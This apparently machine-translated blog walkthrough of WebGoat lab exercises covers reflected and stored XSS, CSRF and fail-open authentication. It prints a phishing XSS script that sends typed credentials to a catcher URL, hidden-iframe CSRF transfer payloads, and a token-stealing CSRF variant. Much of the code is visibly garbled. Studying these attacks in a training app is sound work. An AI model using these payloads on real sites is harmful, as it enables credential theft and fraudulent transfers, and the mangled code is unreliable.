Web Security XSS
Simple Reflective XSS Fishing Demo
</Form><Script> functionHack) {xssimage=New Image; Xssimage.src="Http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" +Document.phish.user.value +"&password=" +Document.phish.pass.value +""; Alert"Had this been a real attack ... Your credentials were just stolen. User Name = "+Document.phish.user.value +"Password =" +Document.phish.pass.value);}</Script><FormName="Phish" ><Br><Br><Hr><H2>this feature requires account login:</H2><Br><Br>enter Username:<Br><InputType="Text"Name="User" ><br>enter password:<br> < input type= "password" Name = "pass" ><br> << Span class= "title" >input type= "submit" name=< Span class= "value" > "login" value= "login" Onclick= "hack ()" ></form> <br><br>< HR>
Enter the above code into the text box, XSS will cause a phishing login interface to cheat the login account and password
Cross-site Scripting (XSS)-lab:cross Site Scripting
This is a systematic introduction to XSS
Stage1-4
These four steps describe the storage-type XSS, the main steps are as follows
- Tom's file is editable, and Jerry can see Tom's file as a human.
- Tom edits his file, puts it into the XSS code, and stores it in the database.
- When Jerry looks at Tom's file, Bam. In the middle of the
Then Stage2 and 4 give two ways to fix the XSS
The first is to check the input, encoding, the second is to encode the output, divided into JS Encode and HTML Encode, the entire 1-4 because there is no soluition, and seemingly XSS has been repaired after the state, so can not be completed ... I feel this class is also broken ...
Stage5-6
Here is the reflection type of XSS tutorial, said that in the Searchstaff has a reflective type of XSS, can be injected into the code there, but did not reproduce, may also be broken ... Stage6 must be in development mode and do not know how to do it.
Cross-site Scripting (XSS)-stored XSS Attacks
Describes one of the most typical examples of storage-type XSS-the message board.
- Message board can enter any information
- No input/output encoding, resulting in XSS
- User A makes a malicious message
- User B points in to automatically display user A's message, in XSS
Cross-site Scripting (XSS)-reflected XSS Attacks
Typical reflective XSS mask, enter your three digit access code: The input box has a reflective XSS vulnerability
Cross-site Scripting (XSS)-cross Site Request Forgery (CSRF)
Here is a storage-type XSS and csrf combination of examples, CSRF is the fake login, the code to forge the request, detailed here, here is the CSRF malicious code using storage-type XSS placed on the Web page, through the message message input
<iframe src="attack?Screen=284&menu=900&transferFunds=5000"></iframe>
You can see that the stored XSS will send out a transfer page, if you want this page to be found by the victim
<iframe src="attack?Screen=284&menu=900&transferFunds=5000" width="1" height="1"></iframe>
Hide this page by setting the width height to 1 pixels
Cross-site Scripting (XSS)-csrf Prompt By-Pass
This is the use of CSRF for fraudulent operation transfer, leaving malicious code as follows
<iframe src= "attack?" screen=282&menu=900&transferfunds=5000 "Id=" MyFrame "frameborder= "1" Marginwidth= "0" Marginheight= "0" width=" "Scrolling=yes height=" "Onload=" document.getElementById (' frame2 '). src= ' attack? Screen=282&menu=900&transferfunds=confirm '; " ></iframe><iframe id= "frame2" frameborder= "1" Marginwidth= "0" Marginheight= "0" width=" "Scrolling=yes height=" "></IFRAME>
- The first IFrame is to make a transfer 5000
- When the second load is complete, go to get the second IFRAME to execute the Transfer confirmation button
- And then construct a second iframe of "id=frame2" in advance.
According to the article, one of the effective ways to prevent CSRF is token, but tokens can be stolen in the case of lax management.
Cross-site Scripting (XSS)-
Demo of CSRF after stealing tokens
<Script>var Tokensuffix;functionReadFrame1 (){var Framedoc =document.getElementById ("Frame1"). Contentdocument;var form = Framedoc.getelementsbytagname ("Form") [0]; Tokensuffix =' &csrftoken= ' + form. Csrftoken.value; LoadFrame2 ();}functionLoadFrame2 (){var testframe =document.getElementById ("Frame2"); Testframe.src="Attack?" screen=278&menu=900&transferfunds=5000 "+ Tokensuffix;}</Script><IframeSrc="Attack?" Screen=278&menu=900&transferfunds=main "Onload="ReadFrame1 ();"Id="Frame1"Frameborder="1"Marginwidth="0"marginheight= "0" width= "
scrolling=
yes height= ">
</
iframe><iframe id= "frame2" frameborder = "1" marginwidth= "0" Marginheight= "0" width= "800" scrolling=yes height= " "></IFRAME>
- First load Main Page steal token
- Then load transfer page to send CSRF transfer request
Cross-site Scripting (XSS)-httponly Test
This is the test of the impact of HttpOnly on the management of third-party cookies, which are marked with HttpOnly cookies that cannot be obtained by JS. So the general session and token are best placed in tagged cookies.
But here is a question, if the user chooses a different DOM can open the HttpOnly to turn off the mark, is it possible to induce the user to switch off first ... Or is this here also for the purpose of the question, but forged the effect of HttpOnly
Improper Error handling-fail Open authentication Scheme
This chapter is mainly about dealing with errors, or the incomplete handling of errors can create loopholes, such as here
- Enter Webgoat account number
- then enter any password
- Intercept Request messages
- Delete password This parameter
This also can be logged in successfully, so that the code is not able to get the password this parameter when the error handling is not sufficient
http://blog.csdn.net/biyukai88/article/details/52251805
Web Security XSS